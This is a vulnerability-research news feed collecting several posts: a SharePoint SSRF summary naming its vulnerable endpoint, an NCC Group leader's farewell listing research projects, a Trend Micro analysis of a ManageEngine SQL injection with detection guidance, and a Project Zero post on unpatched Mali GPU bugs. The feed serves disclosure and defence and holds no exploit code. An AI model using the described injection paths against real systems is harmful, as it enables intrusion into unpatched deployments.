There are new articles available, click to refresh the page.
Yesterday — 29 November 2022Vulnerabily Research

A Ride on the Wild Side with Hacking Heavyweight Sick Codes

29 November 2022 at 18:16
Beverage of Choice: Krating Daeng (Thai Red Bull) Industry Influencer he Admires: Casey John Ellis What did you want to be when you grew up? A physician and nearly did Hobbies (Present & Past): Motorcycling & Australian Football Bucket List: Continuing to discover new software Fun Fact: He currently has 2,000 tabs open “People keep …

A Ride on the Wild Side with Hacking Heavyweight Sick Codes Read More »

Before yesterdayVulnerabily Research

Microsoft SharePoint Server Post-Authentication Server-Side Request Forgery vulnerability

25 October 2022 at 00:00
Overview Disclaimer: No anime characters or animals were harmed during the research. The bug had been fixed but it did not meet that criterion required to get CVE. Recently, we have found a Server-Side Request Forgery (SSRF) in Microsoft SharePoint Server 2019 which allows remote authenticated users to send HTTP(S) requests to arbitrary URL and read the responses. The endpoint <site>/_api/web/ExecuteRemoteLOB is vulnerable to Server-Side Request Forgery (SSRF). The HTTP(S) request is highly customizable in request method, path, headers and bodies.

So long and thanks for all the 0day

23 November 2022 at 19:52

After nearly four years into my role, I am stepping down as NCC Group’s SVP & Global Head of Research. In part just for myself, to reflect on a whirlwind few years, and in part as a thank you and celebration of all of the incredible researchers with whom I have had the privilege of working, I’m writing this post to share:

I am proud of what we have accomplished together. First of all, we survived a global pandemic and somehow managed to publish any security research at all, despite how profoundly this affected so many of us. And it amazes me to say that in fact, across a team of several hundred technical security consultants globally, we’ve published over 600 research publications (research papers, technical blog posts, technical advisories/CVEs, conference talks, and open-source tool releases) since 2019, including releasing well over 60 open-source security tools, and presenting around 150 conference presentations at venues including Black Hat USA, Shmoocon, ACM CCS, Hardwear.io, REcon, IEEE Security & Privacy, Appsec USA, Toorcon, Oracle Code One, BSidesLV, O’Reilly Artificial Intelligence, Chaos Communication Congress, Microsoft BlueHat, HITB Amsterdam, RSA Conference, Ekoparty, CanSecWest, the Linux Foundation Member Summit, DEF CON, and countless others. We won awards, served on advisory boards, hacked drones out of the sky, served on Review Boards of top venues including USENIX WOOT and Black Hat USA, and our research has been covered by media outlets around the world, including Wired, Forbes, The New York Times, Bloomberg, Ars Technica, Politico, DarkReading, Techcrunch, Fast Company, the Wall Street Journal, VICE, and hundreds of other mainstream and trade publications globally.

More importantly, we have: 

  • Watched many researchers graduate from their time at NCC Group to do ever more amazing things, some of whom found their calling through performing their very first research projects within our research program
  • Patched countless vulnerabilities through collaboration with vendors, and sometimes from just writing the patches ourselves
  • Demonstrated the commercial viability of highly specialized security consulting practices driven forward ever further through an intense investment in R&D
  • Advocated and educated for a better (more secure, equitable, privacy-respecting) world through demonstrating the risks and defining the mitigations to critical problems in security & privacy, working with journalists including our numerous collaborations with Which?, and through related policy work like educating US Congressional staffers and testifying before UK Parliament
  • Supported countless researchers to get their first CVEs, publish their first blog posts, overcome fears, get onstage for the first time at Black Hat, and otherwise face the great unknown standing between themselves and their dreams

And I hope that it has been tremendously worthwhile.

Part 1: On leading a security research team

At NCC Group, our approach to security research has been and will continue to be, I think, somewhat unique within our industry. We do not have a small team of full-time researchers we invest in and put on display as evidence of the firm’s broader capability – rather, all of our researchers are seconded to research part-time from their consulting or internal development roles. We are all peers, where people doing their first-ever security research project have equal access to research time and other investment as do established, world-class researchers.

We deliberately resist the trope of the “brilliant asshole,” knowing full well that rockstar-ism and disrespect destroy the type of culture which enables the kind of intellectual risk-taking that security research requires. (Besides – the most talented people I’ve met in my career tend to also be the most humble and kind). 

From my experiences over the past four years, here are a few other things I believe to be true: 

  • Confidence is a skill. A lot of talent is lost to the world for want of a little courage, and sometimes a single comment or experience can change someone’s career forever. As leaders, the greatest gift we can give the people we manage is the skill of confidence – that is, the unshakable belief in someone that they can handle whatever challenges lay before them, and that they are in a safe enough environment that they know where to turn if they find themselves overwhelmed. 
  • We all have an inner critic, but our inner critic is usually wrong. One of my most meaningful memories from my time in this role was at Black Hat/DEF CON/BSidesLV in 2019, where we had over 20 speakers from NCC Group presenting their research. Over half of those researchers confessed to me at some moment leading up to their talks, their feelings of self-doubt, insecurity, or fear. I was grateful to be that person for them, but heartbroken to hear so many talented people question the worth of their work, and sometimes even of themselves. Those speakers universally went on to give excellent talks that were well-received. The lessons here, I think, are both that (1) even the experienced speakers you admire at the best venues in the industry still have moments of imposter syndrome, and thus that, (2) our inner critic tends to be wrong and we should do our best to feel the fear and do things anyway.
  • We are better together. Nothing helps us workshop new ideas and dare to try difficult things like having a trusted community who can share their expertise, give a different perspective, and mentor each other to help us grow. 
  • Elitist gatekeeping holds us all back. There are a number of things our industry needs to stop doing, and most of them are “gatekeeping.” Stop preventing interdisciplinary research and hackily attempting to reinvent other fields. Stop forgetting to give credit to those who did something before you, especially when those people aren’t yet well-known in our industry and it’s easiest to diminish their contributions. Stop making people feel more ashamed to ask a question than to pretend they know something they do not. Stop scaring away new contributors for not having achieved RCE before they started kindergarten. Stop blaming users for not being infosec professionals. Which brings me to my next point….. 
  • Infosec is more meritocratic for some than others. While most of our industry is awesome, there are still people who assume their female peers or leaders are junior, non-technical, or from the Marketing department (which is also a gendered disservice to men in the Marketing department!). Underrepresented people continue to face a disproportionate amount of condescension and exclusion which in turn can make them less likely to submit their talks to CFPs, contribute to OSS, publish their research, or apply for jobs. This barrage of discouragement meaningfully affects individuals, and can even lead to their departure from our industry. Even if CVE allocation and tier-1 conference talk acceptances are agnostic to things like race and gender, the systemic and cultural obstacles edging underrepresented people out of our industry one unwelcoming conversation at a time are not. This needs to be acknowledged if we hope to change it. 
  • Radical inclusivity breeds technical prowess. People do not take intellectual risks (or even ask questions) in environments in which they do not feel psychologically safe. By creating a deliberate culture of warmth, respect, and inclusion of all skill levels and backgrounds, we can take technical and intellectual risks together, view constructive feedback from others as a gift, experiment without necessarily coupling “failure” with “shame,” and accomplish things we’d otherwise dare not try.
  • Bold attempts should be rewarded. At NCC Group, we pay bonuses for achievement in research. For the last few years, we have had several different categories for “achievement,” and you only need to satisfy one of them to qualify for an award. One of the categories under which someone can qualify for one of these bonuses is, “Difficulty, Audacity, and Effort.” We know that trying something difficult is a risk with huge potential upside, but the downside is that it may fail. We have tried to help “own” that risk with our researchers by rewarding valiant efforts to do hard things, even when those things crash and burn. And I think, we’ve been better for it. 

Part 2: A few of my favourite projects (2018-2022)

In the last few years we’ve published well over 600 research talks, blogs, papers, tools and advisories. You can read about every single thing we published in 2020 and 2021 in our corresponding Annual Research Reports. Some of the earlier work has through no fault of our own unfortunately been lost to the sands of time.  

Here, I’ll just share a few (okay, more than a few) of my very favourite things from my time at NCC Group by a number of talented consultants and researchers, past and present. Admittedly, there have been a lot of great projects and this is at best a pseudorandom sample of fond memories. Most of the things below are research projects, but some of them are interesting initiatives we’ve worked on inside or outside NCC Group, not to mention our many publicly-reported security audits of critical software and hardware, and the creation and rapid growth of our Commercial Research division.

  • Assessing Unikernel Security (Spencer Michaels & Jeff Dileo, 2019) 
    The “Infinite Jest” of unikernel security whitepapers, this 104-page monstrosity performed a necessary security deep-dive into unikernels – single-address-space machine images constructed by treating component applications and drivers like libraries and compiling them, along with a kernel and a thin OS layer, into a single binary blob. It challenged the idea that unikernels’ smaller codebases and lack of excess services necessarily imply security, demonstrating through study of the major unikernels Rumprun and IncludeOS that instead, everything old was new again, with now-canonical features like ASLR, W^X, stack canaries, heap integrity checks and more are either completely absent or seriously flawed. The authors furthermore reasoned that if an application running on such a system contains a memory corruption vulnerability, it is often possible for attackers to gain code execution, even in cases where the application’s source and binary are unknown, and worse yet noting that because the application and the kernel run together as a single process, an attacker who compromises a unikernel can immediately exploit functionality that would require privilege escalation on a regular OS, e.g. arbitrary packet I/O.

  • The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations (David Wong & external collaborators Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, & Yuval Yarom, IEEE S&P 2019)
    This phenomenal paper showed that in the 20 years of earnest attempts at patching Bleichenbacher-style padding oracle attacks against RSA implementations of the PKCS #1 v1.5 standard, many are still vulnerable to leakage from novel microarchitectural side channels. In particular, they describe and demonstrate Cache-like ATtacks (CATs), enabling downgrade attacks against any TLS connection to a vulnerable server and recovering all the 2048 bits of the RSA plaintext, breaking the security of 7-out-of-9 popular implementations of TLS. 

  • Practical Attacks on Machine Learning Systems (Chris Anley, 2022)
    This wide-ranging paper by NCC Group’s Chief Scientist, Chris Anley, discusses real-world attack classes possible on machine learning systems. In it, he reminds us that “models are code,” demonstrating vulnerabilities and attacks related to Python Pickle Files, PyTorch’s PT format and State Dictionary formats, a Keras H2 Lambda Layer Exploit, Tensorflow, and Apache MXNet, and to name a few. He also reproduces a number of existing results from the machine learning attack literature, and presents a taxonomy of attacks on machine learning systems including malicious models, data poisoning, adversarial perturbation, training data extraction, model stealing, “masterprints,” inference by covariance, DoS, and model repurposing. Critically, he reminds us that in addition to all of these novel attack types that are specific to AI/ML, traditional hacking techniques still work on these systems also – discussing the problems of credentials in code, dependency risks, and webapp vulnerabilities like SQL injection – of course, an evergreen topic for Chris 🙂

  • Sinking U-Boots with Depthcharge (Jon Szymaniak, Hardwear.io 2020)
    An extensible Python 3 toolkit designed to aid security researchers when analyzing a customized, product-specific build of the U-Boot bootloader. And on the topic of U-boot, let us not forget Nicolas Guigo & Nicolas Bidron’s high & critical U-boot vulnerabilities published in 2022.

  • Unpacking .pkgs: A look inside MacOS installer packages (Andy Grant, DEF CON 27)
    In this work, Andy studied the inner workings of MacOS installer packages and demonstrated where serious security issues can arise, including his findings of a number of novel vulnerabilities and how they can be exploited to elevate privileges and gain code/command execution.

  • ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again (Jeff Dileo, 2020)
    In this work, Jeff discusses a vulnerability he found in containerd – a container runtime underpinning Docker and common Kubernetes configurations – which resulted in full root container escape for a common container configuration. The technical advisory and proof-of-concept can be found here.

  • Co-founding the Open Source Security Foundation (Jennifer Fernick, 2020-present)
    In February 2020, a small group of us across the industry founded the Open Source Security Coalition, with the goal of bringing people from across our industry together to improve the security of the open source ecosystem in a collaborative way, enabling impact-prioritized investment of time and funding toward the most critical and impactful efforts to help secure OSS. In August 2020, this became OpenSSF and moved into its more well-resourced home within the Linux Foundation. Since then, we’ve advised Congressional staffers about supply chain security, which supported the greater work of OpenSSF at the White House Open Source Security Summit. Together with David Wheeler, I also had the privilege of presenting a 2021 Linux Foundation Member Summit Keynote on Securing Open Source Software, which can be viewed here, as well as a talk aimed at security researchers at BHUSA with Christopher Robinson. In May 2022, on the heels of the second OSS Security Summit in DC, we announced the Open Source Software Security Mobilization plan, a $150-million dollar 10-point plan to radically improve the security of open-source software. In this, I wrote both a proposal for Conducting Third-Party Code Reviews (& Remediation) of up to 200 of the Most-Critical OSS Components (Stream 7, pages 38-40) with Amir Montazery of OSTIF, as well as a proposal for a vendor-neutral Open Source Security Incident Response Team (now called OSS-SIRT, in Stream 5, pages 30-33) which is now being led by the inimitable CRob of Intel.

  • There’s A Hole In Your SoC: Glitching The MediaTek BootROM (Jeremy Boone & Ilya Zhuravlev, 2020)
    In this work, Jeremy & Ilya (who was, incredibly, an intern at the time) uncovered an unpatchable vulnerability in the MediaTek MT8163V system-on-a-chip (64-bit ARM Cortex-A), and were able to reliably glitch it to bypass signature verification of the preloader, circumventing all secure boot functionality thus completely breaking the hardware root of trust. What’s worse is they have reason to believe these affects other MediaTek chipsets due to a shared BootROM-to-preloader execution flow across them, likely implying that this vulnerability affects a wide variety of embedded devices such as tablets, smart phones, home networking products, and a range of IoT devices.

  • There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities (Ilya Zhuravlev, 2022)
    In this follow-up to Ilya’s previous work, he studied the security of the UNISOC platform’s boot chain, uncovering several unpatchable vulnerabilities in the BootROM which could persistently undermine secure boot. These vulnerabilities could even, for example, be exploited by malicious software which previously escalated its privileges in order to insert a persistent undetectable backdoor into the boot chain. These chips are used across many budget Android phones including some of the recent models produced by Samsung, Motorola and Nokia.

  • On Linux Random Number Generation (Thomas Pornin, 2019)
    Wherein Thomas made an unforgettable case for why monitoring entropy levels on Linux systems is not very useful.

  • Our research partnership with University College London
    Every year, as a part of our research partnership with UCL’s Centre for Doctoral Training in Data-Intensive Science, we work with a small group of high energy physics and astrophysics PhD students to apply machine learning to a domain-specific problem in cybersecurity. For example, in 2020, we explored deepfake capabilities and mitigation strategies. In 2021, we sought to understand the efficacy of various machine learning primitives for static malware analysis. In 2022, we challenged the students to study the effectiveness of using Generative Adversarial Networks (GANs) to improve fuzzing through preprocessing and other techniques (research paper forthcoming).

  • That time the Exploit Development Group successfully exploited the Lexmark MC3224i printer with a file write bug, as well as gaining code execution on the Western Digital PR4100 NAS at Pwn2own (Aaron Adams, Cedric Halbronn, & Alex Plaskett, 2021)

  • 10 real-world stories of how we’ve compromised CI/CD pipelines (Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, & Jennifer Fernick, 2022)
    We’ve long believed that “CI/CD pipelines are execution engines.” In the past 5 years, we’ve demonstrated countless supply chain attacks in production CI/CD pipelines for virtually every company we’ve tested, with several dozen successful compromises of targets ranging from small businesses to Fortune 500 companies across almost every market and industry. In this blog post we shared 10 diverse examples of ways we’ve compromised development pipelines in real-world engagements with NCC Group clients, with hopes to illuminate the criticality of securing CI/CD pipelines amid our industry’s broader focus on supply-chain security. This blog post was expanded into a talk for BHUSA 2022, “RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise

  • Sleight of ARM: Demystifying Intel Houdini (Brian Hong, BHUSA 2021)
    In this work, Brian reverse engineered Intel’s proprietary Houdini binary translator which runs ARM binaries on x86, demonstrating security weaknesses it introduces into processes using it, showing the capability to do things like execute arbitrary ARM and x86, and write targeted malware that bypasses existing platform analysis for platforms used by hundreds of millions.

  • Why you should fear your mundane office equipment (Daniel Romero & Mario Rivas, DEF CON 27)
    With 35 novel vulnerabilities across 6 major printer manufacturers, this research demonstrated the risks that oft-overlooked networked devices can introduce into enterprises, making a case for how they present significant potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations. Later work in 2022 by Alex Plaskett and Cedric Halbronn demonstrated remote over the network exploitation of a Lexmark printer and persistence across both firmware updates and reboots.

  • Finally releasing the long-awaited whitepaper for TriforceAFL (Tim Newsham & Jesse Hertz, 2017)
    Better late than never! Six years ago, Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. We did some archaeology around NCC and were happy to be able to release the associated paper a few months ago.

  • MacOS vulns including CVE-2020-9817 (Andy Grant, 2019-2020) 
    Andy found both privesc bug in the macOS installer enabling arbitrary code execution with root privileges, effectively leading to a full system compromise. He also disclosed CVE-2020-3882, a bug in macOS enabling an attacker to retrieve semi-arbitrary files from a target victim’s macOS system using only a calendar invite, giving me an excellent excuse to never take a call again (or like, until patching) from my friend Andy Grant 🙂

  • Solitude: A privacy analysis tool (Dan Hastings & Emanuel Flores, Chaos Communication Congress 2020)
    After showing at DEF CON in 2019 that many mobile apps’ privacy policies are lying to us about the data they collect, Dan Hastings was worried about how users who are not themselves security researchers could better understand the privacy risks of the mobile apps. Solitude was created with those users in mind – specifically, this open source privacy analysis tool was created to empower users to conduct their own privacy investigations into where their private data goes once it leaves their web browser or mobile device, and is broadly extensible and configurable to study a wide range of data types across arbitrary mobile applications. This work was also presented to key end-user communities such as activists, journalists, and others at the human rights conference, RightsCon.

  • On the malicious use of large language models like GPT-3 (Jennifer Fernick, 2021)
    This blogpost explored the theoretical question of whether (and how) large language models like GPT-3 or their successors may be useful for exploit generation, and proposed an offensive security research agenda for large language models, based on a converging mix of existing experimental findings about privacy, learned examples, security, multimodal abstraction, and generativity (of novel output, including code) by large language models including GPT-3.

  • Critical vulnerabilities in a prominent OSS cryptography libraries (Paul Bottinnelli, 2021)
    Paul uncovered critical vulnerabilities enabling arbitrary signature forgery of ECDSA signatures in several open-source cryptography libraries – one with over 7.3M downloads in the previous 90 days on PyPI, and over 16,000 weekly downloads on npm.

  • Command and KubeCTL: Real-World Kubernetes Security for Pentesters (Mark Manning, Shmoocon 2020) 
    In this talk and corresponding blog post, Mark explored Kubernetes offensive security across a spectrum of security postures and environments, demonstrating flaws and risks in each – those without regard to security, those with incomplete threat models, and seemingly well-secured clusters. This was a part of a larger body of work by Mark that made significant contributions to the security of k8s.

  • Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes (Cedric Halbronn, 2021)
    Leveraging the Windows Sandbox, Cedric created a Qubes-like containerization for Microsoft Windows, enabling you to spawn applications in isolation. This means that if you browse a malicious site using Wubes, it won’t be able to infect your Windows host without additional chained exploits. Specifically, this means attackers need 1, 2, 3 and 4 below instead of just 1 and 2 in the case of Firefox:

    1) Browser remote code execution (RCE) exploit
    2) Local privilege exploit (LPE)
    3) Bypass of Code Integrity (CI)
    4) HyperV (HV) elevation of privilege (EoP)

  • Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities (Aleksandar Kircanski & Terence Tarvis, 2020)
    This paper sought to offer an overview of the various classes of implementation-level security flaws that commonly arise in proof-of-work blockchains, studying the vulnerabilities found during the first decade of Bitcoin’s existence, with the dual-purpose of both offering a roadmap for security testers performing blockchain security reviews, as well as a reference for blockchain developers on common pitfalls. It enumerated 10 classes of blockchain-specific software flaws, introducing several novel bug classes alongside known examples in production blockchains.

  • Rich Warren’s vulnerabilities in Pulse Connect Secure and Sonicwall (2020-2021)
    Rich Warren and David Cash initially published multiple vulnerabilities in Pulse Connect Secure VPN appliances including an arbitrary file read vulnerability (CVE-2020-8255), an injection vulnerability which can be exploited by an authenticated administrative user to execute arbitrary code as root (CVE-2020-8243), and an uncontrolled gzip extraction vulnerability to overwrite arbitrary files, resulting in RCE as root (CVE-2020-8260). Rich later found that this patch could be bypassed, resulting yet again in RCE (CVE-2021-22937). He later published a series of 6 advisories related to the SonicWall SMA 100 Series, yet again demonstrating systemic vulnerabilities in highly privileged network appliances. This seems to be a theme in our industry, and is highly concerning given major supply chain attack events on similar highly-privileged and ubiquitous network appliances in recent years. I believe it is essential that we continue to dig deeper into the security limitations of these types of devices.

  • F5 Networks Big IP threat intelligence (Research & Intelligence Fusion Team, July 2020)
    In this work, NCC Group’s RIFT team (led by folks including Ollie Whitehouse & Christo Butcher) published initial analysis of active exploitation NCC had observed of the CVSS 10.0, F5 Networks TMUI RCE vulnerability (CVE-2020-5902) allowing arbitrary, active interception of any traffic traversing an internet-exposed, unpatched Big-IP node, initially being used by threat actors to execute code, and later being involving staged exploitation, web shells, and were able to bypass mitigation attempts, including gaining creds, privkeys, TLS certificates to load balancers and more. Here is the Wired piece initially discussing this threat intel.

  • Breaking a class of binary obfuscation technologies (Nicolas Guigo, 2021)
    In this work Nico revealed tools and methods for reversing real-world binary obfuscation, effectively breaking one of the canonical mobile app obfuscation tools and demonstrating that the protections offered by obfuscation tools are probably orders-of-magnitude fewer person-hours for attackers to break than our industry tends to assume. (Bonus points to Nico for sending me his epic initial demo for this set to Eric Prydz’ “Opus”)

  • Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone (Keegan Ryan, ACM CCS 2019)
    This paper showed the susceptibility of TrustZone to sidechannel attacks allowing an attacker to gain insight into the microarchitectural behaviour of trusted code. Specifically, it demonstrated a series of novel vulnerabilities that leak sensitive cryptographic information through shared microarchitectural structures in Qualcomm’s implementation of Android’s hardware-backed keystore, allowing an attacker to extract sensitive information and fully recover a 256-bit ECDSA private key.

  • Popping Locks, Stealing Cars, and Breaking a Billion Other Things: Bluetooth LE Link Layer Relay Attacks (Sultan Qasim Khan, Hardwear.io NL 2022)
    The mainstream headline for this was something like, “we hacked a Tesla and drove away,” but the real headline was that Sultan created the long-hypothesized but yet-unproven world’s first link-layer relay attack on Bluetooth Low Energy, due to the nature of the attack itself even bypassing most existing relay attack mitigations. This story was originally published by Bloomberg but ended up covered by over 900 media outlets worldwide. The advisories for Tesla and BLE are here. This work reminds us that the use of technologies/protocols/standards for security purposes for which they were not designed can be dangerous. 
Video source: Dan Goodin of Ars Technica
  • Hacking in Space (2022-2023)
    Okay, so, this is just a teaser for future work. Keep an eye on this, umm, space 🚀

Conclusion & greets

It feels so strange to say goodbye – we haven’t even released “Symphony of Shellcode” yet 😮  

I’m forever grateful to Dave Goldsmith, Nick Rowe, and Ollie Whitehouse for taking a chance on me and allowing me the unreal opportunity to lead such an esteemed technical team, and for the friendship and contributions of them and of many other technical leaders (past* and present) across NCC Group – not least, NCC Group’s Commercial Research Director and former UK/EU/APAC Research Director Matt Lewis, as well as Jeff Dileo, Jeremy Boone, Will Groesbeck, Kevin Dunn, Ian Robertson, Damian Archer*, Rob Wood, Javed Samuel, Chris Anley, Nick Dunn, Robert Seacord*, Richard Appleby, Timur Duehr, Daniel Romero, Iain Smart, Clint Gibler*, Spencer Michaels*, Drew Suarez*, Joel St John*, Ray Lai*, and Bob Wessen* – as well as our program coordinators Aaron Haymore* and R. Rivera, and the dozens (real talk: hundreds) of talented consultants with whom I’ve had the tremendous privilege of working. Thank you for justifying simultaneously both my deep existential fear that everything is hackable, and my hope that there are so many bright, ethically-minded people using all of their power to make things safer and more secure for us all.

And now, onto the next dream <3

CVE-2022-40300: SQL Injection in ManageEngine Privileged Access Management

In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Justin Hung and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched SQL injection vulnerability in Zoho ManageEngine products. The bug is due to improper validation of resource types in the AutoLogonHelperUtil class. Successful exploitation of this vulnerability could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.


ManageEngine recently patched a SQL injection vulnerability bug in their Password Manager Pro, PAM360, and Access Manager Plus products. The vulnerability is due to improper validation of resource types in the AutoLogonHelperUtil class. A remote attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges.

The Vulnerability

Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents, and digital identities of enterprises. The product is also included in other two similar ManageEngine products: PAM360 and Access Manager Plus. A user can access the web console on these products through HTTPS requests via the following ports:

The HTTP request body may contain data of various types. The data type is indicated in the Content-Type header field. One of the standardized types is multipart, which contains various subtypes that share a common syntax. The most widely used subtype of multipart type is multipart/form-data. Multipart/form-data is made up of multiple parts, each of which contains a Content-Disposition header. Each part is separated by a string of characters. The string of characters separating the parts is defined by the boundary keyword found in the Content-Type header line. The Content-Disposition header contains parameters in “name=value” format. Additional header lines may be present in each part; each header line is separated by a CRLF sequence. The last header line is terminated by two consecutive CRLFs sequences and the form element’s data follows. The filename parameter in a ContentDisposition header provides a suggested file name to be used if the element's data is detached and stored in a separate file.

A user with admin privileges can add/edit a resource type via Password Manager Pro web interface by clicking the menu “Resources” -> “Resource Types” -> “Add” (or “Edit”) and a HTTP multipart/form-data request will be submitted to the “AddResourceType.ve” endpoint, as an example shown below:

where several form-data parts are transferred in the request, like “TYPEID”, “dnsname_label”, “resLabChkName__1”, etc. The data carried in the multipart/form-data part with a name parameter value of “resourceType” represents the name of the resource type, which is relevant to the vulnerability in this report.

An SQL injection vulnerability exists in Password Manager Pro. The vulnerability is due to a lack of sanitization of the name of the resource type in the Java class AutoLogonHelperUtil. The AutoLogonHelperUtil class is used by several controller classes, like AutologonController and PasswordViewController, to construct a partial SQL statement related to the query for existing resource types. For example, if a user clicks the menu “Connections” on the web admin interface, a request will be sent to “AutoLogonPasswords.ec” endpoint, and the includeView() method of ViewProcessorServlet class is called. The includeView() method will use AutologonController class to handle the request. The AutologonController class is derived from the SqlViewController class and its updateViewModel() method is called to process the request. The updateViewModel() method will first call the initializeSQL() method to get an SQL statement. It then calls the getAsTableModel() method of the SQLQueryAPI class to execute the SQL statement.

In the initializeSQL() method, it will call the getSQLString() method of the AutologonController class to get the SQL statement, which will invoke the getFilledString() method of the TemplateAPI class. In the getFilledString() method, it will call the getVariableValue() method of the AutologonController. The getVariableValue() method will use the getOSTypeCriteriaForView() method of the AutoLogonHelperUtil class to construct a partial SQL statement. The getOSTypeCriteriaForView() will call the getOSTypeCriteria() method, which uses getOSTypeList() to read all resource types from the database. It then uses these resource types to build a partial SQL statement as below:

PTRX_OSTYPE in ( <resource type 1>, <resource type 2>, ..., <resource type n> )

where <resource type n> represents a resource type name queried from a database by the getOSTypeList() method. Then, this partial SQL statement will be returned to getOSTypeCriteriaForView() and then be returned to the getFilledString(). The getFilledString() will use this partial SQL statement to generate the final complete SQL statement and return it back to getSQLString().

However, the getOSTypeCriteria() method of the AutoLogonHelperUtil class does not sanitize the name of the resource type (returned from getOSTypeList()) for SQL injection characters before using it to create a partial SQL statement. An attacker can therefore first add a new resource type (or edit an existing resource type) with a crafted resource type name containing a malicious SQL command, and then click a menu such as “Connections” to invoke the methods of the AutoLogonHelperUtil class which will use the malicious resource type name to construct a SQL statement. This could trigger the execution of the injected SQL command.

A remote authenticated attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges.

Detection Guidance

To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the ports listed above. Note that the traffic is encrypted via HTTPS and should be decrypted before performing the following steps.

The detection device must inspect HTTP POST requests to a Request-URI containing the following string:

        /AddResourceType.ve

If found, the detection device must inspect each part of the multipart/form-data parts in the body of the request. In each part, the detection device must search for the Content-Disposition header and its name parameter to see if its value is “resourceType”. If found, the detection device must continue to inspect the data carried in this multipart/ form-data part to see if it contains the single-quote character “' (\x27)”. If found, the traffic should be considered malicious and an attack exploiting this vulnerability is likely underway. An example of malicious requests is shown below:

Additional notes:

• The string matching for the Request-URI and “POST” should be performed in a case-sensitive manner, while other string matching like “name”, “resourceType” and “Content-Disposition” should be performed in a case-insensitive manner.
• The Request-URI may be URL encoded and should be decoded before applying the detection guidance.
• It is possible that the single quote “' (\x27)” is naturally found in the resource type name resulting in false positives. However, in normal cases, the possibility should be low.

Conclusion

ManageEngine patched this and other SQL injections in September. Interestingly, the patch for PAM360 came a day after the patches for Password Manager Pro and Access Manager Plus. The vendor offers no other workarounds. Applying these updates is the only way to fully protect yourself from these bugs.

Special thanks to Justin Hung and Dusan Stevanovic of the Trend Micro Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Research services please visit http://go.trendmicro.com/tis/.

The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

CVE-2022-40300: SQL Injection in ManageEngine Privileged Access Management

Mind the Gap

22 November 2022 at 21:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in the wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title                    Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE                   CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue      6th January 2022

Impact                A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) lead to kernel memory corruption, one (2331) lead to physical memory addresses being disclosed to userspace and the remaining three (2325, 2327, 2333) lead to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

@ProjectZeroBugs\nArm Mali: driver exposes physical addresses to unprivileged userspace\n\n  @jgrusko Replying to @ProjectZeroBugs\nRIP the feature that was there forever and nobody wanted to report :)

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.

